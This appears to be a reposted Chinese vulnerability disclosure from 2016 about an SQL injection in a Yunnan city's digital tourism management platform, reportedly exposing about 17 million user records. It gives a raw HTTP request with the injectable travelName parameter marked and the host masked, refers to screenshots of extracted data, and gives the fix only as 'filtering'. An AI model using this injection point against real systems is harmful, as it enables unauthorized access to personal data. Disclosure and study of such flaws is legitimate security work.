HanDs
NO.2

[7月漏洞公开] 云南某市数字旅游管理平台SQL注射涉及1700w用户信息 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

我没干坏事啊,就是为了wb上个首页,不然没rank看洞,直接20吧,然后我就只差一个wb实习白帽了

详细说明:

没啥特别的,一个简单的注入。

漏洞证明:

数据包:

code 区域
GET /Sms/TravelWebInfo.aspx?travelName=123* HTTP/1.1
Host: **.**.**.**
Accept: application/json, text/javascript, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36
Referer: http://**.**.**.**/Sms/TravelFo/WebUrlInfo.htm
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8



数据了来咯!!!

1.PNG



2.PNG



3.PNG



4.PNG

修复方案:

过滤


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
云南 某市 数字 旅游管理 平台 S QL
#1楼
发帖时间:2016-7-11   |   查看数:0   |   回复数:0
游客组